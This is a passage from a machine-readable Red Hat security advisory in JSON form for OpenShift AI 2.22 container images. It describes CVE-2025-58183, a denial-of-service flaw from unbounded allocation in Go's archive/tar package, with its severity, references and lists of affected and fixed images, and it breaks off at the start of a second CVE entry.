"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407258"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to be able to process a specially crafted GNU tar pax 1.0 archive with the application using the archive/tar package. Additionally, this issue can cause the Go application to allocate a large amount of memory, eventually leading to an out-of-memory condition and resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "RHBZ#2407258",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407258"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://go.dev/cl/709861",
"url": "https://go.dev/cl/709861"
},
{
"category": "external",
"summary": "https://go.dev/issue/75677",
"url": "https://go.dev/issue/75677"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI",
"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4014",
"url": "https://pkg.go.dev/vuln/GO-2025-4014"
}
],
"release_date": "2025-10-29T22:10:14.376000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map"
},
{
"cve": "CVE-2025-58754",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-09-12T02:00:53.897605+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
